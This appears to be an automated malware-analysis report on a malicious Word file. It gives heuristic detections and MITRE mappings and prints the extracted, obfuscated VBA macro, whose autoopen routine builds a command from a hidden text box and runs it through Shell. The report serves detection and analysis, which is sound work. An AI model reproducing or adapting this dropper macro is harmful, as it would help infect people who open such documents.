MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and triggers the execution of other VBA code. Heuristics indicate a 'Shell()' call within the VBA, which is used to invoke 'cmd.exe' with execution flags. This strongly suggests the macro's purpose is to download and execute a secondary payload.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6781698-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6781698-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(mGuBHHIMHPA, sclQSQ), aGzJrF) Set KMBkNdftTjGiVRcKiaL = NhIkECmIBJutZwmHUlZj -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() kbqOifZPH -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6652 bytes |
SHA-256: 80c3888be74bcaaf428adfc26d5761becce2a714f7cca412af7dac7d8021b763 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
176 of 213 identifiers look randomly generated (e.g. 'wQENjNhzmSWjXvwSzfNzwXvv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FhvdaZPnwbHE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
kbqOifZPH
End Sub
Attribute VB_Name = "hzcfaiYr"
Function kbqOifZPH()
On Error Resume Next
Set pTrYEGvDzcaWcETXKV = ojMVEUttPLwarLBuQD
bTiLVQaQTJCOQPoinczmELNf = Sqr(ABjKaJCTOtAFYqEiDakNzhK)
jORSRrQFDTUPqF = 296390884 * Oct(zuCWnYOltHBlcRuTqfiLrkCW) * 188894131 * CEVoozhlOCfoQHAjZJqfclZ - (10157324 + CLng(LbhHPsftsWKQETDErDs) * 263123274 * CBool(13649657))
WLLKtjzSRfUPcVzdw = ChrW(zuYlpQUpmblhhNXw)
Set zKSafKXnKtFLbKEqzKGzhc = udifOvXFJcfiolvrSbl
LPoXDrObiQiHUiX = Sqr(ziIrmovivcQEDTnXvXQioKcX)
vWtuYOGNwtoStSXUGbab = 65053513 * Oct(PcKLwRtJmBlKrRCnXOJ) * 286834464 * ZzEBEtKhjBvXXGQ - (235455214 + CLng(RoUoHmhibFRSEMRS) * 125912775 * CBool(278227557))
GKrYicDApnTKmELzVXQR = ChrW(XSdosOipdEEQmdCZ)
Set sISjSzUadinLpwZcavUz = LkWnhhwZqQlXBJKwviPO
GFPdzwchBdBrzjYvtkRYA = Sqr(OCoopOfiQEivEfGKikUsom)
jDcmACuwqkTqNpLGNBWMz = 61931760 * Oct(bsoiBhEHwbSHkN) * 187944173 * cWGrKkosVXdGrSamWBAt - (80398616 + CLng(sRmdVPvhatlWuprSrr) * 26170550 * CBool(313674992))
iDzQfAfliMiSIipE = ChrW(OYzowkVUXkvEJJpQHNNp)
Set hJCrVtLLjvwjafLszjo = qqJwMqDTspcNmliZNCdjz
ZpHjAALduhLBjrAF = Sqr(fqrTqTktoBmfzCHmdQTp)
pDHOvvBlCmZHXzqGuiWW = 251687211 * Oct(wZwwiEOFajPzqmjE) * 308318760 * iImONXaFQjjizSuiFiP - (335939148 + CLng(zWwLssYHEWpozodZj) * 82096591 * CBool(179239138))
YohWsjwFMhBpvHllpD = ChrW(fCwLKuuziQEVVocsJp)
Const sclQSQ = 0
Set wjKSjfuMQiwjOSdJBlvawqD = SiiQKfVrqqaWikRljD
qLzilYJOAdSsHd = Sqr(zEAiClMHqYsHaRTJuvnNJS)
trAQVNXwStskNk = 10921988 * Oct(RiDIGsRiwjTXwT) * 107754231 * hDHmBUruTZZOihGYtuWi - (38772791 + CLng(uAaSUotzBwcMCJdO) * 340734939 * CBool(324144867))
JojTCAPauiBzhaXJGMiACA = ChrW(XalVfzviuYvwVOhXSF)
Set HnVlwUscJJdEwOBBvGVkTa = kibYdwaqBpjhcaDDfiwhZWsZ
caPjfVWjrkGXvPfi = Sqr(bPPhYbsDqFWsXNlCL)
WKJWTNAlpwjjPQ = 337385848 * Oct(vdKjDwXdoQzoUXU) * 137148801 * OJXIEvCjnlvWGqFtQSIsf - (325424273 + CLng(mjhDNMRScLzAHbwqhH) * 338544681 * CBool(106857302))
cGiZuuDFLcERmkcW = ChrW(pUWTSLGpwRRbbkjhKKZzdSR)
Set SPfTCqWzaWwLaYw = zPhWWlnFjKcJMUZBdt
INDllMiPBDhpvzEw = Sqr(EQkhcZjrNMlGzvhh)
pHwdwJoWmCBVjKHX = 86369178 * Oct(MIijoTuXAwJDHAIjKwAiHGvK) * 278279015 * hWhCdikzUYhITdjZJs - (81089662 + CLng(uBMzAKXipGMTpRlYqzSbT) * 66818023 * CBool(204816808))
BBdXziwDwHcjJjBTKFHOL = ChrW(SBrKiLZkOkWcwzhAi)
mGuBHHIMHPA = FhvdaZPnwbHE.TextBox1 + UioFP + zROCQYni + ozkiNtr + mCmKbAE + kMmvbPaT + FEJRFUq
Set nmrwJUIKnjPpmjEE = JiAKmIZESUvvCADAuPqrMif
IzhUrkzWbTlGwzB = Sqr(StrANPkfLorTNMhiDrBm)
ENiWYTjOzEuOMZTnivt = 99083907 * Oct(JCsdJPlHCEzOCN) * 210453714 * iowBQNkzFAnOrYv - (55288819 + CLng(YvKptPDzHuzzzJMniAH) * 322610533 * CBool(90862225))
vSvYIcXQiIpqdRVTlZsDIT = ChrW(zFqbaMYoLJmAruUGbarQr)
Set zjEaMvnrGqJjRCHjzHA = CfPwrhjcKtOQqOnKazZBczHR
jvKYNlITrYRTFjfP = Sqr(hNcspCOzGzhzWDYw)
KlVDwHGzwqVqVOulQRtpUq = 295961849 * Oct(bHmaTUUtVTYtuHkFWurMsHkk) * 262901249 * FmiJRTsYcpVfdiVc - (139076850 + CLng(pArJjoSZzjDTWB) * 250957287 * CBool(36594428))
iPMBFBViukqRMqQmj = ChrW(nWwFqqsTMUITTtYPnMIAkwWi)
Set JCRuZscQUXVzDTSE = zkDRzAtBiNBjKjMlwafLnW
EmBRrtTVGscCwYuMCXtrfb = Sqr(KoJNHsntzazzfvjBHPrur)
jQNCOcnufHcFrcijMdTzd = 189561259 * Oct(YPQTWlbnjqcHszEiKFFupWaE) * 40170831 * bDObrEDRonzJRIEUwO - (97128257 + CLng(pjHwJuXiJBoMNDJXYE) * 333746299 * CBool(158425575))
bLRhAnwpVaLpld = ChrW(wQSzjVImwlwOzhwrQqQOVpRI)
Set vZsvMQTirkQXUlESj = jfoaUnGwkaRhGjhqhURnhiAc
ojuEjfnJzfRaVEFpOjtQJijq = Sqr(EkAtOziLcfGLuBudYJEP)
MPMzSCGLoKADZivnQ = 227182954 * Oct(mPtZwiUfwnlVcbOrUovwu) * 158569633 * nVGHUWzqIaWcATqOTzWIYCpX - (187524901 + CLng(nbzUlnOPFDrWAJwz) * 192982882 * CBool(307135573))
wOYdaczXPbkjiiJ = ChrW(YrnoiNkNmWwzNJaZuRdzO)
Set EFniUkousTDHVLkF = nJmsqfFAotEDWjSbrbwXXfa
WIsRSzkQOWJjcUNaiijrkqWm = Sqr(jijoiUHjpWhmnhrInpAXj)
WOVopzjMfmFhmTBbjBBAnwjn = 307967233 * Oct(piwBVPBhHVStfH) * 338883822 * quhGvYHLJwWjLYiiupKA - (107139083 + CLng(RqfELfJnWtAKHlFoEQbk) * 289790567 * CBool(150924615))
SWjnkzqzwMMdqbrMbCWcciB = ChrW(zcFktZfmuzMhcsZnf)
Set WicocomwPnhMZpEW = UnCwNWhisUaOdpw
rWNTWDUOKrSSwzTufiGq = Sqr(OIHvGkULkmwiiiTqCkQTn)
WEOltAfjvjIscNFYPTzDZE = 135802795 * Oct(ORADczqWzcmDjVqUfBqOa) * 274595408 * GliUwTkMRjfXbzc - (46320135 + CLng(slvzbCsucfXYOFJYLuSzctCM) * 109588754 * CBool(133030813))
BwPUDutVotGfimaToN = ChrW(DdVwQEJJUzjjiGirwNLTdU)
tobdWca = Array(bImBrj, YTvDZz, ZivwU, Interaction _
_
_
_
_
_
_
_
.Shell(mGuBHHIMHPA, sclQSQ), aGzJrF)
Set KMBkNdftTjGiVRcKiaL = NhIkECmIBJutZwmHUlZj
jLDvEJhAmJoOGNdDQjKq = Sqr(rKpNEZiVptAbzhWFpz)
EIPAGiTiJDDEPsIoBNizjDi = 320991095 * Oct(nnGfHwbjRmNcJiilq) * 138779652 * lolirtUrGzJBiSjSr - (83543673 + CLng(CEbXwGuLrfAOti) * 79089670 * CBool(72087622))
BEOmmHVhHljKaPrYnSN = ChrW(QnbwhdMGlQTSHHRm)
Set UZBmTiANtdjowjnDPwfHRhXz = AFThcFWWumuScOMHuMqkwVrQ
aOKKjnBCoSYjjQXMS = Sqr(zslmjTAWUhOCfO)
RCrMLOztPnwnaO = 314398156 * Oct(XdRtXfnfqKJSUomnK) * 196602999 * OjAGqzwVznjaIYOqY - (92260754 + CLng(flPMVBEjZbBIcwzhlX) * 149767096 * CBool(177232154))
ZJnrKjAtFzNZqwcwUiFlQZuz = ChrW(DiJrdSBnXGccUKREmUdn)
Set jswbwSFVNRZdICuz = RoYEvQFboaloktPbUtMR
wzbQuuAGpqMNFpQnIoctA = Sqr(sThcXJCnIhhzToz)
BVEUzkZbiEznLFkYiqHHjR = 149505229 * Oct(EBhifIWbpUnGpfIHuGwTKOb) * 21190124 * JPcjpEjwNQzCuvWiXwqRdiDi - (340332278 + CLng(cTCjpZihWstuAQDH) * 183202912 * CBool(94070852))
FzLblmQklTaLthbb = ChrW(vjbXXNZdoczaOWHpX)
Set MwwwLDUGvCJfMICrvADu = wQENjNhzmSWjXvwSzfNzwXvv
JtOMivCriOjsibqmIJkmwpND = Sqr(vVpwBaUJSZTTlHWUpoj)
ZQDXKnNLJzUjLniaM = 306176728 * Oct(nLiQCWTXBORIAjkwfRSl) * 93639149 * JAVEmHwZwHvIsGrA - (9113978 + CLng(rQMwroUAaoDIuI) * 121075533 * CBool(177056178))
ivzjLZbSKNroiH = ChrW(QRuwAMJjkmhJWnNmpREI)
Set dkdEKbrFSmqMcwlfcF = aviXnVvRiiPCYVrK
fXwKPtvMqWIQQFAamLXvN = Sqr(iPJJbDjSrlmCzFGDLCnKwz)
BRYObmJTPVpojAFSrdYfXd = 95547178 * Oct(vUjzVHDsjdIsDpH) * 213607146 * RWjKQXCFjvjYUOXCRTHCJ - (331237234 + CLng(RwFFsNPCVszGGhw) * 205452310 * CBool(325127321))
umLWUOOkplWAdXSPONKR = ChrW(sTtLjXIQUVnKWPMv)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.